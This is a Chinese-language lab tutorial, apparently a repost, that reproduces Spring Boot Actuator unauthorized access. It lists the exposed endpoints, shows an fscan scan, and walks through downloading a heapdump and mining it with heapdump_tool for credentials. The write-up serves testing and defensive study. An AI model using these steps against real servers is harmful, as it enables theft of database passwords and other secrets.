更新時間：2022.07.20

微信公眾號：烏鴉安全

1. 漏洞介紹

Spring Boot Actuator 模塊提供了生產級別的功能，比如健康檢查，審計，指標收集，HTTP 跟蹤等，幫助監(jiān)控和管理Spring Boot 應用。這個模塊是一個采集應用內部信息暴露給外部的模塊，上述的功能都可以通過HTTP 和 JMX 訪問。（來源：https://mp.weixin.qq.com/s/qY-hBSa9u62TNB4-A4RZ9Q）
Actuator是Spring Boot提供的應用系統(tǒng)監(jiān)控的開源框架。在攻防場景里經常會遇到Actuator配置不當?shù)那闆r，攻擊者可以直接下載heapdump堆轉儲文件，然后通過一些工具來分析heapdump文件，從而可進一步獲取敏感信息。（來源：https://mp.weixin.qq.com/s/qY-hBSa9u62TNB4-A4RZ9Q）

2. 漏洞環(huán)境搭建

搭建環(huán)境：windows10 + java1.8
可以直接按照命令進行操作，但是在環(huán)境搭建中，可能會遇到一定的問題：

git clone https://github.com/callicoder/spring-boot-actuator-demo.git cd spring-boot-actuator-demo-master mvn package java -jar target/actuator-demo-0.0.1-SNAPSHOT.jar

mvn的安裝，可以百度下，比較容易。
執(zhí)行mvn package

此時出現(xiàn)報錯：

因為我們使用的沒有IDE，所以在這可以用這個方法：
https://blog.csdn.net/qq_39323945/article/details/125110368

其他的方法可能不是很合適。繼續(xù)編譯，等待一會之后，編譯成功：

然后啟動環(huán)境：java -jar target/actuator-demo-0.0.1-SNAPSHOT.jar

訪問當前的ip信息：http://10.211.55.5:8080/

此時環(huán)境搭建完成。

3. 漏洞利用

3.1 漏洞發(fā)現(xiàn)

一般來說，這種可以通過掃描工具發(fā)現(xiàn)漏洞，在這里可以用fscan來試試：
./fscan_darwin -h 10.211.55.5

在這里可以發(fā)現(xiàn)有兩個漏洞：

[+] http://10.211.55.5:8080 poc-yaml-springboot-env-unauth spring2 [+] http://10.211.55.5:8080 poc-yaml-spring-actuator-heapdump-file

3.2 利用方法

來源：https://mp.weixin.qq.com/s/qY-hBSa9u62TNB4-A4RZ9Q
Actuator 存在兩個版本

1.x版本

/configprops # 顯示所有@ConfigurationProperties /env # 公開 Spring 的ConfigurableEnvironment /health # 顯示應用程序運行狀況信息 /httptrace # 顯示 HTTP 跟蹤信息 /metrics # 顯示當前應用程序的監(jiān)控指標信息。 /mappings # 顯示所有@RequestMapping路徑的整理列表 /threaddump # 線程轉儲/heapdump # 堆轉儲 /jolokia # JMX-HTTP橋,它提供了一種訪問JMX beans的替代方法

2.x版本

/actuator/configprops # 顯示所有@ConfigurationProperties /actuator/env # 公開 Spring 的ConfigurableEnvironment /actuator/health # 顯示應用程序運行狀況信息 /actuator/httptrace # 顯示 HTTP 跟蹤信息 /actuator/metrics # 顯示當前應用程序的監(jiān)控指標信息。 /actuator/mappings # 顯示所有@RequestMapping路徑的整理列表 /actuator/threaddump # 線程轉儲 /actuator/heapdump # 堆轉儲 /actuator/jolokia # JMX-HTTP橋,它提供了一種訪問JMX beans的替代方法

3.2 springboot-env-unauth

公開 Spring 的ConfigurableEnvironment
http://10.211.55.5:8080/actuator/env

http://10.211.55.5:8080/actuator/configprops

2.3 spring-actuator-heapdump

其實在實戰(zhàn)中，最重要的就是heapdump文件，在這里文件里面理論上可以發(fā)現(xiàn)很多敏感的數(shù)據(jù)庫之類的信息。
http://10.211.55.5:8080/actuator/heapdump
該文件可以直接下載到本地來，使用專業(yè)工具進行解密；
專業(yè)工具地址：https://github.com/wyzxxz/heapdump_tool
使用方法：java -jar heapdump_tool.jar heapdump

在這里選擇1，然后搜索關鍵字：

當然，在這個環(huán)境中，暫時沒有發(fā)現(xiàn)什么敏感信息，但是在實戰(zhàn)里面，有概率是可以發(fā)現(xiàn)敏感數(shù)據(jù)的：

4. 總結

關于其他的工具來獲取明文信息的，可以參考一下鏈接：
https://mp.weixin.qq.com/s/JKq4WxFKwh7IDIAqTKcTHw

總結

以上是生活随笔為你收集整理的Springboot Actuator未授权访问漏洞复现的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。